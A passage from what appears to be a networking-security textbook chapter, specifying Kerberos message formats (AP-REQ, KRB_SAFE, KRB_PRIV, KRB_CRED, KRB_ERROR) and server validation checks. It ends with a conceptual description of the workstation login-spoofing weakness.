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In most requests for initial authentication and most replies, thepadata field is left out.

Also can contain information needed by certain extensions to theKerberos protocol. It might be used, for example, to initially verifythe identity of a client before any response is returned.

patimestamp Contains the client’s time.

pausec Contains the microseconds. It may be omitted if a client cannotgenerate more than one request per second.

Also contains information needed to help the KDC or the clientselect the key needed for generating or decrypting the response,useful for supporting the use of certain “smartcards” withKerberos.

padata-type Indicates the way that the padata-value element is to be inter-preted. Negative values of padata-type are reserved for unregistereduse. Non-negative values are used for a registered interpretation ofthe element type.

req-body Delimits the extent of the remaining fields. If a checksum is to becalculated over the request, it is calculated over an encoding of theKDC-REQ-BODY sequence that is enclosed within the req-bodyfield.

kdc-options Appears in the KRB_AS_REQ and KRB_TGS_REQ requests tothe Key Distribution Center. Indicates the flags that the clientwants set on the tickets as well as other information to modify thebehavior of the Key Distribution Center.

cname and sname Same as those described for the ticket. sname may only be absentwhen the ENC-TKT-IN-SKEY option is specified. If absent, thename of the server is taken from the name of the client in theticket passed as additional-tickets.

enc-authorization-data The enc-authorization-data, if present (and it can only be pres-ent in the TGS_REQ form), is an encoding of the desiredauthorization-data. It is encrypted under the sub-session key ifpresent in the Authenticator, or alternatively from the session keyin the Ticket Granting Ticket, both from the padata field in theKRB_AP_REQ.

Table 9.5, ContinuedKRB_KDC_REQ Message Fields

Field Description

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realm Specifies the realm part of the server’s principal identifier. In theAuthentication Server exchange, this is also the realm part of theclient’s principal identifier.

from Included in the KRB_AS_REQ and KRB_TGS_REQ ticketrequests when the requested ticket is to be postdated and specifiesthe desired start time for the requested ticket.

till Contains the expiration date requested by the client in a ticketrequest.

rtime (optional) The requested renew-till time sent from a client to the KeyDistribution Center in a ticket request.

nonce Part of the Key Distribution Center request and response. Holds arandom number generated by the client. If the same number isincluded in the encrypted response from the Key DistributionCenter, it provides evidence that the response is fresh and has notbeen replayed by an attacker. Nonces must never be reused.Ideally it should be generated randomly, but if the correct time isknown, it may suffice. If the time is used as the nonce, and thetime is ever reset backward, there is a small, but finite, probabilitythat a nonce will be reused.

etype Specifies the desired encryption algorithm to be used in theresponse.

addresses Included in the initial request for tickets, and optionally includedin requests for additional tickets from the Ticket Granting Service;specifies the addresses from which the requested ticket is to bevalid. Usually includes the addresses for the client’s host. If a proxyis requested, contains other addresses. The contents of this fieldare usually copied by the Key Distribution Center into the caddrfield of the resulting ticket.

additional-tickets Additional tickets may be optionally included in a request to theTicket Granting Service. If the ENC-TKT-IN-SKEY option hasbeen specified, then the session key from the additional ticket willbe used in place of the server’s key to encrypt the new ticket. Ifmore than one option which requires additional tickets has beenspecified, then the additional tickets are used in the order specifiedby the ordering of the options bits (see kdc-options, earlier).

The optional fields are included only if necessary to perform the operation specified in the kdc-options field.

Field Description

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In KRB_TGS_REQ, the protocol version number appears twice and two different messagetypes appear. The KRB_TGS_REQ message contains these fields, as does the authenticationheader (KRB_AP_REQ) passed in the padata field.

KRB_KDC_REP DefinitionThe KRB_KDC_REP message format is used for the reply from the Key Distribution Centerfor an initial (Authentication Server) request or a subsequent (Ticket Granting Service)request. The message type is KRB_AS_REP or KRB_TGS_REP.

The key used to encrypt the ciphertext part of the reply depends on the message type. ForKRB_AS_REP, the ciphertext is encrypted in the client’s secret key, and the client’s keyversion number is included in the key version number for the encrypted data. ForKRB_TGS_REP, the ciphertext is encrypted in the subsession key from the Authenticator,or if absent, the session key from the Ticket Granting Ticket used in the request. In that case,no version number is present in the EncryptedData sequence.

The KRB_KDC_REP message contains the following fields:


KDC-REP = { pvno[0] INTEGER, msg-type[1] INTEGER, padata[2] SEQUENCE OF PA-DATA OPTIONAL, crealm[3] Realm, cname[4] PrincipalName, ticket[5] Ticket, enc-part[6] EncryptedData }

EncASRepPart = EncKDCRepPartEncTGSRepPart = EncKDCRepPart

EncKDCRepPart = { key[0] EncryptionKey, last-req[1] LastReq, nonce[2] INTEGER, key-expiration[3] KerberosTime OPTIONAL, flags[4] TicketFlags, authtime[5] KerberosTime, starttime[6] KerberosTime OPTIONAL, endtime[7] KerberosTime, renew-till[8] KerberosTime OPTIONAL, srealm[9] Realm, sname[10] PrincipalName, caddr[11] HostAddresses OPTIONAL }

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Table 9.6 describes the fields in this message.

Table 9.6KRB_KDC_REP Message Fields

Field Description

pvno and msg-type Described earlier. msg-type is KRB_AS_REP or KRB_TGS_REP.

padata Described in detail earlier.

crealm, cname, Same as those described for the ticket.srealm, and sname

ticket The newly issued ticket.

enc-part Serves as placeholder for the ciphertext and related information thatforms the encrypted part of a message.

key Same as described for the ticket.

last-req Returned by the Key Distribution Center and specifies the time(s) ofthe last request by a principal. Depending on what information isavailable, this might be the last time that a request for a TicketGranting Ticket was made, or the last time that a request based on aTicket Granting Ticket was successful. It might cover all servers for arealm, or just the particular server. Some implementations may displaythis information to the user to aid in discovering unauthorized use ofone’s identity. It is similar in spirit to the last login time displayedwhen logging into timesharing systems.

nonce Described earlier.

key-expiration Part of the response from the Key Distribution Center and specifiesthe time that the client’s secret key is due to expire.

flags, authtime, All duplicates of those found in the encrypted portion of the attachedstarttime, endtime, ticket.renew-till, and caddr

The Client/Server Authentication ExchangeNetwork applications use the client/server authentication (CS) exchange to authenticate theclient to the server and vice versa. The client must already have acquired credentials for theserver using the Authentication Server or Ticket Granting Server exchange.

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Note The exchange consists of two messages: KRB_AP_REQ from the client to Kerberos,and KRB_AP_REP or KRB_ERROR in reply.

The KRB_AP_REQ MessageThe KRB_AP_REQ contains authentication information that should be part of the firstmessage in an authenticated transaction. It contains a ticket, an authenticator, and someadditional bookkeeping information. The ticket by itself is insufficient to authenticate a client,because tickets are passed across the network in cleartext. Tickets contain an encrypted and anunencrypted portion, so cleartext here refers to the entire unit. Tickets can be copied from onemessage and replayed in another without any cryptographic skill. The Authenticator is used toprevent invalid replay of tickets by proving to the server that the client knows the session keyof the ticket and thus is entitled to use it. The KRB_AP_REQ message is referred to elsewhereas the “authentication header.”

Generation of a KRB_AP_REQ MessageWhen a client wants to initiate authentication to a server, it obtains a ticket and session key forthe desired service. The client can reuse any tickets it holds until they expire. The client thenconstructs a new Authenticator from the system time, its name, optionally, an application-specific checksum, an initial sequence number to be used in KRB_SAFE or KRB_PRIVmessages, and/or a session subkey to be used in negotiations for a session key unique to thisparticular session.

Authenticators may not be reused and are rejected if replayed to a server. This can makeapplications based on unreliable transports, such as UDP, difficult to code correctly. In suchcases, a new Authenticator must be generated for each retry. If a sequence number is to beincluded, it should be chosen randomly so that even after many messages have been exchanged,collision with other sequence numbers in use is not likely.

The client can indicate a requirement of mutual authentication or the use of a session-keybased ticket by setting the appropriate flag(s) in the ap-options field of the message.

The Authenticator is encrypted in the session key and combined with the ticket to formthe KRB_AP_REQ message that is then sent to the end server along with any additionalapplication-specific information.

Receipt of a KRB_AP_REQ MessageAuthentication is based on the server’s current time of day (clocks must be loosely synchro-nized), the Authenticator, and the ticket. If an error occurs, the server is expected to reply tothe client with a KRB_ERROR message. This message can be encapsulated in the applicationprotocol if its “raw” form is not acceptable to the protocol.

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There are several checks the server makes to verify the authentication. If the message type isnot KRB_AP_REQ, the server returns the KRB_AP_ERR_MSG_TYPE error. If the keyversion indicated by the ticket in the KRB_AP_REQ is not one the server can use, theKRB_AP_ERR_BADKEYVER error is returned. If the USE-SESSION-KEY flag is set in theap-options field, it indicates to the server that the ticket is encrypted in the session key fromthe server’s Ticket Granting Ticket rather than its secret key. Because it is possible for theserver to be registered in multiple realms, with different keys in each, the srealm field in theunencrypted portion of the ticket in the KRB_AP_REQ is used to specify which secret key theserver should use to decrypt that ticket. The KRB_AP_ERR_NOKEY error code is returned ifthe server doesn’t have the proper key to decipher the ticket.

The ticket is decrypted using the version of the server’s key specified by the ticket.If the decryption routines detect a modification of the ticket, theKRB_AP_ERR_BAD_INTEGRITY error is returned. In this case, chances aregood that different keys were used to encrypt and decrypt.

The authenticator is decrypted using the session key extracted from the decrypted ticket. Ifdecryption shows it to have been modified, the KRB_AP_ERR_BAD_INTEGRITY error isreturned. The name and realm of the client from the ticket are compared against the samefields in the Authenticator.

If, on the other hand, they don’t match, the KRB_AP_ERR_BADMATCH error is returned.They might not match, for example, if the wrong session key was used to encrypt the Authen-ticator. The addresses in the ticket (if any) are then searched for an address that matches theoperating–system-reported address of the client. If no match is found or the server insists onticket addresses when none are present in the ticket, the KRB_AP_ERR_BADADDR error isreturned.

If the server time and the client time in the authenticator differ by more than the allowableclock skew (5 minutes), the KRB_AP_ERR_SKEW error is returned. If the server name alongwith the client name, time and microsecond fields from the Authenticator match any recentlyseen such tuples, the KRB_AP_ERR_REPEAT error is returned.

The rejection here is restricted to Authenticators from the same principal to the same server.Other client principals communicating with the same server principal should not have theirAuthenticators rejected if the time and microsecond fields happen to match some other client’sauthenticator.

The server must remember any authenticator presented within the allowable clock skew, sothat a replay attempt is guaranteed to fail. If a server loses track of any authenticator presentedwithin the allowable clock skew, it will reject all requests until the clock skew interval haspassed. This assures that any lost or replayed authenticators will fall outside the allowable clockskew and can no longer be successfully replayed. If this is not done, an attacker could conceiv-ably record the ticket and authenticator sent over the network to a server.

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It could then disable the client’s host, pose as the disabled host, and replay the ticket andauthenticator to subvert the authentication. If a sequence number is provided in the authenti-cator, the server saves it for later use in processing KRB_SAFE and/or KRB_PRIV messages. Ifa subkey is present the server saves it for later use or uses it to help generate its own choice for asubkey to be returned in a KRB_AP_REP message.

The server computes the age of the ticket: server time minus the start time inside the Ticket. Ifthe start time is later than the current time by more than the allowable clock skew or if theINVALID flag is set in the ticket, the KRB_AP_ERR_TKT_NYV error is returned. Other-wise, if the current time is later than the end time by more than the allowable clock skew, theKRB_AP_ERR_TKT_EXPIRED error is returned.

If all these checks succeed without an error, the server is assured that the client possesses thecredentials of the principal named in the ticket and thus, the client has been authenticated tothe server.

Generation of a KRB_AP_REP MessageTypically, a client’s request includes both the authentication information and its initial requestin the same message. The server need not explicitly reply to the KRB_AP_REQ. If mutualauthentication is being performed, however, the KRB_AP_REQ message will have MUTUAL-REQUIRED set in its ap-options field. Then a KRB_AP_REP message is required in response.As with the error message, this message can be encapsulated in the application protocol if itsraw form is unacceptable to the application’s protocol. The timestamp and microsecond fieldused in the reply must be the client’s timestamp and microsecond field, as provided in theAuthenticator. If a sequence number is to be included, it should be chosen randomly, asdescribed earlier for the Authenticator. A subkey can be included if the server desires tonegotiate a different subkey. The KRB_AP_REP message is encrypted in the session keyextracted from the ticket.

Receipt of a KRB_AP_REP MessageIf a KRB_AP_REP message is returned, the client uses the session key from the credentialsobtained for the server to decrypt the message, and then verifies that the timestamp andmicrosecond fields match those in the Authenticator it sent to the server. If they match, theclient is assured that the server is genuine. The sequence number and subkey, if present, areretained for later use.

Using the Encryption KeyAfter the KRB_AP_REQ/KRB_AP_REP exchange has occurred, the client and server sharean encryption key that can be used by the application. The “true session key” to be used forKRB_PRIV, KRB_SAFE, or other application-specific purposes can be chosen by the applica-tion based on the subkeys in the KRB_AP_REP message and the Authenticator. In some cases,

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the use of this session key is implicit in the protocol. In other cases the method of use must bechosen from several alternatives.

With both the one-way and mutual authentication exchanges, the peers should take care not tosend sensitive information to each other without proper assurances. In particular, applicationsthat require privacy or integrity should use the KRB_AP_REP or KRB_ERROR responsesfrom the server to client to assure both client and server of their peer’s identity. If an applica-tion protocol requires privacy of its messages, it can use the KRB_PRIV message. TheKRB_SAFE message can be used to assure integrity.

Client/Server (CS) Message SpecificationsThis section specifies the format of the messages used for the authentication of the client to theapplication server.

KRB_AP_REQ DefinitionThe KRB_AP_REQ message contains the Kerberos protocol version number, the message typeKRB_AP_REQ, an options field to indicate any options in use, and the ticket and authentica-tor themselves. The KRB_AP_REQ message is often referred to as the authentication header.

AP-REQ = { pvno[0] INTEGER, msg-type[1] INTEGER, ap-options[2] APOptions, ticket[3] Ticket, authenticator[4] EncryptedData }

APOptions = BIT STRING { reserved(0), use-session-key(1), mutual-required(2), reserved(3-31) }

Table 9.7 describes the fields in this message.

Table 9.7KRB_AP_REQ Message Fields

Field Description

pvno and msg-type Described earlier. msg-type is KRB_AP_REQ.

ap-options Appears in the application request (KRB_AP_REQ) and affects theway the request is processed.


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Table 9.7, ContinuedKRB_AP_REQ Message Fields

Field Description

The USE-SESSION-KEY option indicates that the ticket the clientis presenting to a server is encrypted in the session key from theserver’s Ticket Granting Ticket. When this option is not specified,the ticket is encrypted in the server’s secret key.

The MUTUAL-REQUIRED option tells the server that the clientrequires mutual authentication, and that it must respond with aKRB_AP_REP message.

ticket Authenticates the client to the server.

authenticator Contains the authenticator, which includes the client’s choice of asubkey.

KRB_AP_REP DefinitionThe KRB_AP_REP message contains the Kerberos protocol version number, the message type,and an encrypted timestamp. The message is sent in response to an application request(KRB_AP_REQ) in which the mutual authentication option has been selected in the ap-options field.

AP-REP = { pvno[0] INTEGER, msg-type[1] INTEGER, enc-part[2] EncryptedData }

EncAPRepPart = { ctime[0] KerberosTime, cusec[1] INTEGER, subkey[2] EncryptionKey OPTIONAL, seq-number[3] INTEGER OPTIONAL }

Table 9.8 describes the fields in this message.

Table 9.8KRB_AP_REP Message Fields

Field Description

pvno and msg-typeq Described earlier. msg-type is KRB_AP_REP.

enc-part Described earlier.

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Field Description

ctime Contains the current time on the client’s host.

cusec Contains the microsecond part of the client’s timestamp.

subkey Contains an encryption key to be used to protect this specificapplication session. Unless an application specifies otherwise, if thisfield is left out, the subsession key from the authenticator is used. Ifthe subsession key also is left out, the session key from the ticket isused.

Error Message ReplyIf an error occurs while processing the application request, the KRB_ERROR message is sentin response. The cname and crealm fields can be left out if the server cannot determine theirappropriate values from the corresponding KRB_AP_REQ message. If the Authenticator wasdecipherable, the ctime and cusec fields contain the values from it.

The KRB_SAFE ExchangeThe KRB_SAFE message may be used by clients that require the capability to detect modifi-cations of messages they exchange. It achieves this by including a keyed, collision-proofchecksum of the user data and some control information. The checksum is keyed with anencryption key. Kerberos usually uses the last key negotiated via subkeys, or the session key ifno negotiation has occurred.

Generation of a KRB_SAFE MessageWhen an application needs to send a KRB_SAFE message, it collects its data and the appropri-ate control information and computes a checksum over them. The checksum algorithm shouldbe some sort of keyed one-way function such as the RSA-MD5-DES, or the DES-MAC,generated using the subsession key if present, or otherwise the session key. Different algorithmscan be selected by changing the checksum type in the message. Unkeyed or non-collision-proofchecksums are not suitable for this use.

Next, a decision must be made about the appropriate control information to use. The controlinformation for the KRB_SAFE message includes a timestamp and a sequence number.Designers of applications that use the KRB_SAFE message must choose at least one of the twomechanisms based on the needs of the application protocol.

Sequence numbers are useful when all messages sent will be received by one’s peer. Connectionstate presently is required to maintain the session key, so maintaining the next sequencenumber should not present an additional problem.

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If the application protocol is expected to tolerate lost messages without them being resent, theuse of the timestamp is the appropriate replay detection mechanism. Using timestamps also isthe appropriate mechanism for multicast protocols in which all one’s peers share a commonsubsession key, but some messages are sent to a subset of one’s peers.

After computing the checksum, the client then transmits the information and checksum to therecipient.

Receipt of KRB_SAFE MessageWhen an application receives a KRB_SAFE message, it verifies it as follows. If any erroroccurs, an error code is reported for use by the application.

The message is first checked by verifying that the protocol version and type fieldsmatch the current version and KRB_SAFE, respectively. A mismatch generates aKRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error.

The application verifies that the checksum used is a collision-proof keyed checksum, and if itis not, a KRB_AP_ERR_INAPP_CKSUM error is generated. The recipient verifies that theoperating system’s report of the sender’s address matches the sender’s address in the message. Ifa recipient address is specified or the recipient requires an address, then it checks that one ofthe recipient’s addresses appears as the recipient’s address in the message. A failed match foreither case generates a KRB_AP_ERR_BADADDR error. Then the timestamp and usecand/or the sequence number fields are checked.

If timestamp and usec are expected and not present, or they are present but not current, theKRB_AP_ERR_SKEW error is generated. If the server name along with the client name, time,and microsecond fields from the Authenticator match any recently seen such tuples, theKRB_AP_ERR_REPEAT error is generated. If an incorrect sequence number is included, ora sequence number is expected but not present, the KRB_AP_ERR_BADORDER error isgenerated. If neither a timestamp and usec nor a sequence number is present, aKRB_AP_ERR_MODIFIED error is generated.

Finally, the checksum is computed over the data and control information, and if it doesn’tmatch the received checksum, a KRB_AP_ERR_MODIFIED error is generated.

If all the checks succeed, the application is assured that the message was generated by its peerand not modified in transit.

KRB_SAFE Message SpecificationThis section specifies the format of a message that can be used by either side, client or server,of an application to send a tamperproof message to its peer. It presumes that a session keyhas previously been exchanged; for example, by using the KRB_AP_REQ/KRB_AP_REPmessages.

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KRB_SAFE DefinitionThe KRB_SAFE message contains user data along with a collision-proof checksum keyed withthe session key. The message fields are as follows:

KRB-SAFE = { pvno[0] INTEGER, msg-type[1] INTEGER, safe-body[2] KRB-SAFE-BODY, cksum[3] Checksum }

KRB-SAFE-BODY = { user-data[0] BYTE STRING, timestamp[1] KerberosTime OPTIONAL, usec[2] INTEGER OPTIONAL, seq-number[3] INTEGER OPTIONAL, s-address[4] HostAddress, r-address[5] HostAddress OPTIONAL }

The fields for this message are described in table 9.9.

Table 9.9KRB_SAFE Message Fields

Field Description

pvno and msg-type Described earlier. msg-type is KRB_SAFE.

safe-body Serves as a placeholder for the body of the KRB-SAFE message. It is tobe encoded separately and then have the checksum computed over it,for use in the cksum field.

cksum Contains the checksum of the application data. The checksum iscomputed over the encoding of the KRB-SAFE-BODY sequence.

user-data Part of the KRB_SAFE and KRB_PRIV messages. It contains theapplication specific data that is being passed from the sender to therecipient.

timestamp Part of the KRB_SAFE and KRB_PRIV messages. Its contents are thecurrent time as known by the sender of the message. By checking thetimestamp, the recipient of the message is able to make sure that it wasrecently generated, and is not a replay.

usec Part of the KRB_SAFE and KRB_PRIV headers. It contains themicrosecond part of the timestamp.

seq-number Described earlier.


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s-address Specifies the address in use by the sender of the message.

r-address Specifies the address in use by the recipient of the message. It can beomitted for some uses, such as broadcast protocols, but the recipientcan arbitrarily reject such messages. This field, along with s-address,can be used to help detect messages that have been incorrectly ormaliciously delivered to the wrong recipient.

The KRB_PRIV ExchangeThe KRB_PRIV message provides clients confidentiality and the capability to detect modifica-tions of exchanged messages by encrypting the messages and adding control information.

Generation of a KRB_PRIV MessageWhen an application needs to send a KRB_PRIV message, it collects its data and the appropri-ate control information and encrypts them under an encryption key, usually the last keynegotiated via subkeys, or if no negotiation has occurred, the session key. As part of the controlinformation, the client must choose to use a timestamp, a sequence number, or both. After theuser data and control information are encrypted, the client transmits the ciphertext and some“envelope” information to the recipient.

Receipt of KRB_PRIV MessageWhen an application receives a KRB_PRIV message, it verifies it as follows. If any erroroccurs, an error code is reported for use by the application.

The message is first checked by verifying that the protocol version and type fieldsmatch the current version and KRB_PRIV, respectively. A mismatch generates aKRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error. The application thendecrypts the ciphertext and processes the resultant plaintext. If decryption shows the data tohave been modified, a KRB_AP_ERR_BAD_INTEGRITY error is generated. The recipientverifies that the operating system’s report of the sender’s address matches the sender’s addressin the message. If a recipient address is specified or the recipient requires an address, then itchecks that one of the recipient’s addresses appears as the recipient’s address in the message. Afailed match for either case generates a KRB_AP_ERR_BADADDR error.

Then the timestamp and usec and/or the sequence number fields are checked. If time-stamp and usec are expected and not present, or if they are present but not current, theKRB_AP_ERR_SKEW error is generated. If the server name along with the client name, time,

Table 9.9, ContinuedKRB_SAFE Message Fields

Field Description

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and microsecond fields from the Authenticator match any recently seen such tuples, theKRB_AP_ERR_REPEAT error is generated. If an incorrect sequence number is included,or a sequence number is expected but not present, the KRB_AP_ERR_BADORDER erroris generated. If neither a timestamp and usec nor a sequence number is present, aKRB_AP_ERR_MODIFIED error is generated.

If all the checks succeed, the application can assume the message was generated by its peer, andwas securely transmitted.

KRB_PRIV Message SpecificationThis section specifies the format of a message that can be used by either side, client or server,of an application to send, securely and privately, a message to its peer. It presumes that asession key has previously been exchanged.

KRB_PRIV DefinitionThe KRB_PRIV message contains user data encrypted in the Session Key. The message fieldsare as follows:

KRB-PRIV = { pvno[0] INTEGER, msg-type[1] INTEGER, enc-part[3] EncryptedData }

EncKrbPrivPart = { user-data[0] BYTE STRING, timestamp[1] KerberosTime OPTIONAL, usec[2] INTEGER OPTIONAL, seq-number[3] INTEGER OPTIONAL, s-address[4] HostAddress, — sender’s addr r-address[5] HostAddress OPTIONAL — recip’s addr }

Table 9.10 describes the fields for this message.

Table 9.10KRB_PRIV Message Fields

Field Description

pvno and msg-type Described earlier. msg-type is KRB_PRIV.

enc-part Holds an encoding of the EncKrbPrivPart sequence encrypted underthe session key. This encrypted encoding is used for the enc-part fieldof the KRB-PRIV message.


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user-data, Described earlier.timestamp, usec,s-address, andr-address

seq-number Described earlier.

The KRB_CRED ExchangeThe KRB_CRED message can be used by clients who require the capability to send Kerberoscredentials from one host to another. It achieves this by sending the tickets together withencrypted data that contain the session keys and other information associated with the tickets.

Generation of a KRB_CRED MessageWhen an application needs to send a KRB_CRED message, it first obtains credentials to besent to the remote host. Then it uses the ticket or tickets it obtains to construct a KRB_CREDmessage. It places the necessary session key to use each ticket in the key field of the correspond-ing KrbCredInfo sequence of the encrypted part of the KRB_CRED message.

Other information associated with each ticket and obtained during the KRB_TGS exchangealso is placed in the corresponding KrbCredInfo sequence in the encrypted part of theKRB_CRED message. The current time and, if specifically required by the application, thenonce, s-address, and r-address fields are placed in the encrypted part of the KRB_CREDmessage. It is then encrypted under an encryption key previously exchanged in the KRB_APexchange.

Receipt of KRB_CRED MessageWhen an application receives a KRB_CRED message, it verifies it. If any error occurs, an errorcode is reported for use by the application. The message is verified by checking that theprotocol version and type fields match the current version and KRB_CRED, respectively. Amismatch generates a KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error.

The application then decrypts the ciphertext and processes the resultant plaintext. Ifdecryption shows the data to have been modified, a KRB_AP_ERR_BAD_INTEGRITY erroris generated. If present or required, the recipient verifies that the operating system’s report ofthe sender’s address matches the sender’s address in the message.

Next it checks that one of the recipient’s addresses appears as the recipient’s address in themessage. A failed match for either case generates a KRB_AP_ERR_BADADDR error. The

Table 9.10, ContinuedKRB_PRIV Message Fields

Field Description

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timestamp and usec fields, and the nonce field if required, are checked next. If the timestampand usec are not present, or if they are present but not current, the KRB_AP_ERR_SKEWerror is generated.

If all the checks succeed, the application stores each of the new tickets in its ticket cachetogether with the session key and other information in the corresponding KrbCredInfosequence from the encrypted part of the KRB_CRED message.

KRB_CRED Message SpecificationThis section specifies the format of a message that can be used to send Kerberos credentialsfrom one principal to another. It presumes that a session key has already been exchangedperhaps by using the KRB_AP_REQ/KRB_AP_REP messages.

KRB_CRED DefinitionThe KRB_CRED message contains a sequence of tickets to be sent and information needed touse the tickets, including the session key from each. The information needed to use the ticketsis encrypted under an encryption key previously exchanged. The message fields are as follows:

KRB-CRED = { pvno[0] INTEGER, msg-type[1] INTEGER, — KRB_CRED tickets[2] SEQUENCE OF Ticket, enc-part[3] EncryptedData }

EncKrbCredPart = { ticket-info[0] SEQUENCE OF KrbCredInfo, nonce[1] INTEGER OPTIONAL, timestamp[2] KerberosTime OPTIONAL, usec[3] INTEGER OPTIONAL, s-address[4] HostAddress OPTIONAL, r-address[5] HostAddress OPTIONAL }

KrbCredInfo = { key[0] EncryptionKey, prealm[1] Realm OPTIONAL, pname[2] PrincipalName OPTIONAL, flags[3] TicketFlags OPTIONAL, authtime[4] KerberosTime OPTIONAL, starttime[5] KerberosTime OPTIONAL, endtime[6] KerberosTime OPTIONAL renew-till[7] KerberosTime OPTIONAL, srealm[8] Realm OPTIONAL, sname[9] PrincipalName OPTIONAL, caddr[10] HostAddresses OPTIONAL }

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Table 9.11 describes the fields in this message.

Table 9.11KRB_CRED Message Fields

Field Description

pvno and msg-type Described earlier. msg-type is KRB_CRED.

tickets The tickets obtained from the Key Distribution Center specificallyfor use by the intended recipient. Successive tickets are paired withthe corresponding KrbCredInfo sequence from the enc-part of theKRB-CRED message.

enc-part Holds an encoding of the EncKrbCredPart sequence encryptedunder the session key shared between the sender and the intendedrecipient. This encrypted encoding is used for the enc-part field ofthe KRB-CRED message.

nonce If practical, an application may require the inclusion of a noncegenerated by the recipient of the message. If the same value isincluded as the nonce in the message, it provides evidence that themessage is fresh and has not been replayed by an attacker. A noncemust never be reused.

timestamp and usec Specify the time that the KRB-CRED message was generated. Thetime is used to provide assurance that the message is fresh.

s-address and r-address Described earlier. Used to provide additional assurance of theintegrity of the KRB-CRED message.

key Exists in the corresponding ticket passed by the KRB-CREDmessage and is used to pass the session key from the sender to theintended recipient.

The following fields are optional. If present, they can be associated with the credentials in theremote ticket file. If left out, it is assumed that the recipient of the credentials already knowstheir value.

Field Description

prealm and pname The name and realm of the delegated principal identity.

lags, authtime, starttime, Contain the values of the corresponding fields from theendtime, renew-till, ticket found in the ticket field. Descriptions of sname, andsrealm, sname, and caddr the fields are identical to the descriptions in thecaddr KDC-REP message.

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NamesKerberos realms are encoded as GeneralString. Realms cannot contain a character that has thecode 0 (the ASCII NULL). Most realms consist of several components separated by periods (.)in the style of Internet domain names or separated by slashes (/) in the style of X.500 names. APrincipalName is a sequence of components consisting of the following subfields:

Realm = GeneralString

PrincipalName = { name-type[0] INTEGER, name-string[1] GeneralString }

The principal name encoding consists of the following two fields:

■ name-type. Specifies the type of name that follows.

■ name-string. Encodes a sequence of components that form a name. Each componentis encoded as a GeneralString. Taken together, a PrincipalName and a Realm form aprincipal identifier. Most PrincipalNames will have only a few components, typicallyone or two. No two names can be the same. At least one of the components, or therealm, must be different.

TimeThe timestamps used in Kerberos are encoded as GeneralizedTime. An encoding specifies theUTC time zone (Z) and cannot include any fractional portions of the seconds. It furthercannot include any separators. Example: The only valid format for UTC time 6 minutes, 27seconds after 9 PM on 6 November 1985 is 19851106210627Z.

Host AddressesKerberos messages usually contain a reference to a specific host, or a list of hosts. Thatreference is stored as a host address. A host address is a sequence of components consistingof the following subfields:

HostAddress = { addr-type[0] INTEGER, address[1] BYTE STRING }

HostAddresses = { addr-type[0] INTEGER, address[1] BYTE STRING }

The host address encoding consists of the following two fields:

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■ addr-type. Specifies the type of address that follows.

■ address. Encodes a single address of type addr-type.

The two forms differ slightly. HostAddress contains exactly one address. HostAddressescontains a sequence of possibly many addresses.

Authorization DataKerberos messages contain authorization data, which is a sequence of components consisting ofthe following subfields:

AuthorizationData = { ad-type[0] INTEGER, ad-data[1] BYTE STRING }

The authorization data encoding consists of the following two fields:

■ ad-type. Specifies the format for the ad-data subfield. All negative values are reservedfor local use. Non-negative values are reserved for registered use.

■ ad-data. Contains authorization data to be interpreted according to the value of thecorresponding ad-type field.

Last Request DataAs a part of the Authentication Server transaction, a last request field is returned. The contentsof this field should be displayed to users to enable them to detect unauthorized use of theiraccount. The last request is a sequence of components consisting of the following subfields:

LastReq = { lr-type[0] INTEGER, lr-value[1] KerberosTime }

Table 9.12 describes the fields in this message.

Table 9.12Last Request Fields

Field Description

lr-type Indicates how the following lr-value field is to be interpreted. Negative valuesindicate that the information pertains only to the responding server. Non-negativevalues pertain to all servers for the realm.

0 No information conveyed by lr-value subfield.

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1 Time of last initial request for a Ticket Granting Ticket.

2 Time of last initial request.

3 Time of issue for newest Ticket Granting Ticket used.

4 Time of last renewal.

5 Time of last request of any type.

lr-value Contains the time of the last request. The time must be interpreted according tothe contents of the accompanying lr-type subfield.

Error Message SpecificationThis section specifies the format for the KRB_ERROR message. The fields included in themessage are intended to return as much information as possible about an error. Don’t expectall the information required by the fields to be available for all types of errors. If the appropri-ate information is not available during composition of the message, the corresponding field isleft out of the message.

Because the KRB_ERROR message is not protected by any encryption, an intruder couldsynthesize or modify such a message. In particular, this means that the client should not useany fields in this message for security-critical purposes, such as setting a system clock orgenerating a fresh Authenticator. The message can be useful, however, for advising a user onthe reason for some failure.

KRB_ERROR DefinitionThe KRB_ERROR message consists of the following fields:

KRB-ERROR = { pvno[0] INTEGER, msg-type[1] INTEGER, ctime[2] KerberosTime OPTIONAL, cusec[3] INTEGER OPTIONAL, stime[4] KerberosTime, susec[5] INTEGER, error-code[6] INTEGER, crealm[7] Realm OPTIONAL, cname[8] PrincipalName OPTIONAL, realm[9] Realm, — Correct realm sname[10] PrincipalName, — Correct name e-text[11] GeneralString OPTIONAL, e-data[12] BYTE STRING OPTIONAL }

Field Description

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Table 9.13 describes the fields in this message.

Table 9.13KRB_ERROR Field Descriptions

Field Description

pvno and msg-type Described earlier. msg-type is KRB_ERROR.

ctime Described earlier.

cusec Described earlier.

stime Contains the current time on the server, of type KerberosTime.

susec Contains the microsecond part of the server’s timestamp.

error-code Contains the error code returned by Kerberos or the server when arequest fails.

crealm, cname, srealm, Described earlier.and sname

e-text Contains additional text to help explain the error code associatedwith the failed request. It might include, for example, a principalname that was unknown.

e-data Contains additional data about the error for use by the applicationto help it recover from or handle the error. If the errorcode isKDC_ERR_PREAUTH_REQUIRED, the e-data field containsan encoding of a sequence of padata fields, each corresponding toan acceptable preauthentication method and optionally containingdata for the method.

If the error-code is KRB_AP_ERR_METHOD, then the e-data field contains an encoding ofthe following sequence:

METHOD-DATA = { method-type[0] INTEGER, method-data[1] BYTE STRING OPTIONAL }

Table 9.14 describes the fields in this option.

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Table 9.14Error Method Field Descriptions

Field Description

method-type Indicates the required alternative method.

method-data Contains any required additional information.

Kerberos Workstation AuthenticationProblem

Requests for Kerberos Ticket Granting Tickets are sent in plaintext to the Kerberos server,which responds with credentials encrypted in the requesting principal’s secret key. Theprogram then attempts to decrypt the data with the supplied password and considers theauthentication “successful” if the decryption appears to yield meaningful results, such as thecorrect principal name.

The problem here is that the requesting program cannot know for sure whether the decryptionsucceeded or, more importantly, whether the response actually came from the Kerberos server.An attacker could, for example, walk up to an unattended machine and “log in” as a nonexist-ent user. Kerberos eventually responds with an appropriate error, but the attacker can arrangefor another program to deliver a fake response to log in first. He then types the correctpassword, which he knows because he created the fake response in the first place, and succeedsin spoofing login.

